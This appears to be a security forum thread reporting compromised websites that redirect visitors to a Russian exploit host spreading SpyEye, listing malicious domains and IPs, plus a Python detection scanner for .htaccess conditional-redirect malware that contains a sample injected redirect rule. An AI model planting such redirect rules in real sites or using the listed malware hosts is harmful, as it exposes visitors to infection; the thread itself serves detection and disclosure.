site infection

hxxp://medialunchbox.com has been compromised.

The site redirects to ctredret.ru (46.4.168.244) which hosts the exploit code. The other referrer was hxxp://chineseflashcards.com.

http://www.virustotal.com/url-scan/report.html?id=9ee61f2f10c18d0612673c50c5588c90-1322833799

http://www.virustotal.com/file-scan/report.html?id=82943eccb45b079e3230d70d0af4ccce2cf3597ce4a2deaad0d04010113f57a5-1322829020

Hi razoreqx

Thanks very much for this important find and for reporting it.

According to sucuri this was detected: http://sucuri.net/malware/entry/MW:SPAM:SEO

Avast detects HTML:Iframe-inf here.

Was this malware also reported to MBAM, because help forums will ask users to run MBAM against this?

The redirect site has spread mdl_trojan SpyEye from -http://ctredret.ru/w.php?f=17&e=2 (now dead) and spreads unknown_html_RFI from -http://ctredret.ru/main.php (live) at the moment (the latter has not been detected before).

polonus

Hi razoreqx,

For the second referrer you mention, Sucuri has found this site infected with the following malware: Suspicious conditional redirect, on:
-http://chineseflashcards.com/lefty.html
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7

Will redirect users to: -http://94.137.30.212 (ozsmk dot ru), a phishing domain;
a scan probe from that address was logged: 2011/08/24-10:20:05.251659 94.137.30.212 probe 132.235.2.217 : 3389

polonus

Also read this:

Conditional redirects (or the htaccess malware)
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
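The conditional-redirect (htaccess malware) technique linked above works by chaining RewriteCond directives that test the visitor's request headers, commonly the referrer or user agent, onto a RewriteRule that sends matching visitors to an off-site URL, so the site owner browsing directly never sees the redirect. The following Python scanner is an added example written for this thread; it is not Sucuri's, Avast's or MBAM's detection logic. The sample .htaccess content, the site host list, the 198.51.100.23 address and the choice of headers to treat as suspicious are all constructed assumptions for illustration.

```python
"""Heuristic scanner for conditional-redirect ("htaccess malware") rules.

Flags a RewriteRule whose target is an absolute URL on a foreign host when
one of the RewriteCond directives preceding it keys on the visitor's
referrer or user agent.  Example code for this thread, not a vendor's
signature; all sample data below is constructed.
"""
import re
from urllib.parse import urlparse

# Request variables typically used to show the redirect only to search-engine
# visitors and hide it from the owner (assumption: list is illustrative).
SUSPICIOUS_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample: a normal WordPress block followed by an injected rule.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|msn)\\..* [NC]
RewriteRule ^(.*)$ http://198.51.100.23/in.php?r=$1 [R=302,L]
"""


def scan_htaccess(text, own_hosts=()):
    """Return a list of findings, one per suspicious RewriteRule.

    Each finding records the rule's line number, the redirect target host,
    whether that host is a bare IPv4 literal, and the RewriteCond test
    strings that made the rule conditional on the visitor's headers.
    """
    own = {h.lower() for h in own_hosts}
    pending = []   # RewriteCond directives waiting for the next RewriteRule
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # comments, blank lines and other directives
        target = m.group(2)
        # Conditions that test the visitor's referrer / user agent.
        header_conds = [c for c in pending
                        if any(v in c[1].upper() for v in SUSPICIOUS_VARS)]
        pending = []  # conditions are consumed by this RewriteRule
        if not header_conds:
            continue
        host = urlparse(target).hostname if "://" in target else None
        if host is None or host.lower() in own:
            continue  # internal rewrite or redirect to the site itself
        findings.append({
            "line": lineno,
            "target_host": host,
            "ip_literal": bool(IPV4_RE.match(host)),
            "conditions": [c[1] for c in header_conds],
        })
    return findings


if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE_HTACCESS, own_hosts=("example.com",)):
        print(f"line {f['line']}: conditional redirect to {f['target_host']}"
              f" (IP literal: {f['ip_literal']}) keyed on {f['conditions']}")
```

Run against a real site's .htaccess by reading the file and passing the site's own hostnames in `own_hosts`; a legitimate mobile-site redirect keyed on the user agent will also be reported, so treat output as a lead to review rather than a verdict.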

Hi Pondus,

Another reason for webmasters to update their website software, in this case WordPress.
Thanks for giving the link to the description of the conditional redirects malware.

polonus

Thanks for the good feedback :)